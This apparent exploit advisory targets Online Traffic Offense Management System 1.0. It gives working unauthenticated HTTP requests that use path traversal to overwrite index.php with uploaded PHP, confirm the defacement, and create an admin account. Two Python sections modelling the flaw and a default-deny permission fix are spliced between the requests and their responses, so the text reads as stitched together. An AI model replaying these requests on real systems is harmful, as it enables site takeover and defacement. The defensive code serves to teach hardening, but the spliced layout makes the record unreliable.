Exploits / Vulnerability Discovered: 2021-10-08
Type: webapps
Platform: php
Online Traffic Offense Management System 1.0 - privilege escalation (unauthenticated). This exploit / vulnerability is for educational purposes only; if you use it, you do so at your own risk.
# All requests below can be sent by both an authenticated and an unauthenticated user
# The vulnerabilities in the application allow:
* Reading any PHP file on the server
* Saving files to parent and child directories and overwriting existing files on the server
* Performing operations with application administrator rights as an unauthenticated user
-----------------------------------------------------------------------------------------------------------------------
# Request that overwrites index.php in the web application's root directory (the closing part of the multipart body is shown)
<?php
echo "Hacked other client files in this hosting!";
?>
-----------------------------329606699635951312463334027403--
# The new file's extension is taken from the uploaded file name, here filename="fuzzdb.php"
# The new file's name and location are taken from the form field value, here 5/../../../index, so path traversal lets us save the file in another directory ;)
# The value must start with a digit
# Config files can be overwritten the same way
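The write primitive described above comes from two caller-controlled inputs: a name field that is used as a path, and an extension copied from the uploaded file name. The following Python is an added example, not code from the advisory or from the Online Traffic Offense Management System; it models that behaviour and shows the two checks a hardened handler needs (an extension allowlist and a containment check on the resolved path). The upload root, the numeric-id naming rule and the allowed extensions are assumptions; the root is placed two directory levels below the application root because that is the depth the page's `5/../../../index` value traverses to reach `traffic_offense/index.php`.

```python
import posixpath

# Assumed upload root (not stated on the page): two levels below the app root.
UPLOAD_ROOT = "/var/www/html/traffic_offense/uploads/evidence"
# Assumed allowlist; the real application's accepted types are not stated on the page.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "pdf"}


def extension_of(upload_filename):
    """Return the lower-cased extension of an uploaded file name, or '' if none."""
    if "." not in upload_filename:
        return ""
    return upload_filename.rsplit(".", 1)[-1].lower()


def vulnerable_target(root, name_field, upload_filename):
    """Model of the behaviour the advisory describes: the name field is joined
    onto the root unchanged and the extension is copied from the upload, so
    '5/../../../index' + 'fuzzdb.php' lands on the application's index.php."""
    return posixpath.normpath(posixpath.join(root, name_field + "." + extension_of(upload_filename)))


def hardened_target(root, name_field, upload_filename):
    """Hardened version: allowlist the extension, require a plain numeric id
    (assumed naming rule) and verify the resolved path stays under the root.
    Raises ValueError on any violation."""
    ext = extension_of(upload_filename)
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension not allowed: %r" % ext)
    if not name_field.isdigit():
        raise ValueError("name must be a numeric id, got %r" % name_field)
    candidate = posixpath.normpath(posixpath.join(root, name_field + "." + ext))
    # Belt and braces: even if the naming rule is relaxed later, the resolved
    # path must still share the upload root as its common prefix.
    if posixpath.commonpath([root, candidate]) != root:
        raise ValueError("path escapes upload root: %s" % candidate)
    return candidate


def safe_to_save(root, name_field, upload_filename):
    """Convenience wrapper returning True only if hardened_target accepts the input."""
    try:
        hardened_target(root, name_field, upload_filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs taken from the advisory's own example values.
    print("vulnerable:", vulnerable_target(UPLOAD_ROOT, "5/../../../index", "fuzzdb.php"))
    print("traversal rejected:", not safe_to_save(UPLOAD_ROOT, "5/../../../index", "fuzzdb.php"))
    print("legit accepted:", hardened_target(UPLOAD_ROOT, "5", "photo.png"))
```

The containment check uses `normpath` plus `commonpath` on the string path; in PHP the equivalent is `realpath()` on the destination directory after creating it, compared against the upload root, since `realpath()` also resolves symlinks that string normalisation cannot see.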
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request that fetches index.php again to confirm it was overwritten
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8
Hacked other client files in this hosting!
-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations as an unauthenticated user with application administrator rights
# The application allows many operations to be performed without authorization; it has no permission matrix. The entire application is affected
# Request that adds a new admin user to the application; it succeeds without any authenticated session
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
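The page states that the application has no permission matrix, which is why `classes/Users.php?f=save` accepts an admin-creating request from anyone. The following Python is an added example, not the application's code, of the server-side check that is missing: a default-deny matrix keyed by the script and the `f` action from the request line, evaluated before the handler runs. The roles, the second script name (`Offenses.php`) and the session shape are hypothetical; only `Users.php` and `f=save` come from the page.

```python
# Hypothetical roles and permission matrix; the application on the page has none.
ADMIN = "admin"
STAFF = "staff"

# (script, f action) -> set of roles allowed to call it. Anything not listed is denied.
PERMISSIONS = {
    ("Users.php", "save"): {ADMIN},
    ("Users.php", "delete"): {ADMIN},
    ("Offenses.php", "save"): {ADMIN, STAFF},   # hypothetical endpoint
    ("Offenses.php", "delete"): {ADMIN},        # hypothetical endpoint
}


def parse_action(request_line):
    """Extract (script, f) from an HTTP request line such as
    'POST /traffic_offense/classes/Users.php?f=save HTTP/1.1'."""
    _method, target, _version = request_line.split(" ", 2)
    path, _, query = target.partition("?")
    script = path.rsplit("/", 1)[-1]
    params = {}
    for pair in query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            params.setdefault(key, value)   # first value wins, as PHP's $_GET would not
    return script, params.get("f")


def authorize(request_line, session):
    """Return (allowed, reason). session is None for an unauthenticated client,
    otherwise a dict with a 'role' key (assumed session shape)."""
    script, action = parse_action(request_line)
    allowed_roles = PERMISSIONS.get((script, action))
    if allowed_roles is None:
        # Unknown script/action pairs are denied rather than silently allowed.
        return False, "default deny: %s?f=%s is not in the matrix" % (script, action)
    if session is None or "role" not in session:
        return False, "login required"
    if session["role"] not in allowed_roles:
        return False, "role %r may not call %s?f=%s" % (session["role"], script, action)
    return True, "ok"


if __name__ == "__main__":
    # Constructed request line copied from the advisory's Example 4.
    line = "POST /traffic_offense/classes/Users.php?f=save HTTP/1.1"
    for who in (None, {"role": STAFF}, {"role": ADMIN}):
        print(who, "->", authorize(line, who))
```

The order of the checks matters: the matrix lookup comes first so that an endpoint nobody thought to register can never be reached by an anonymous caller, and the login check precedes the role check so that an unauthenticated request is refused before any role comparison is attempted.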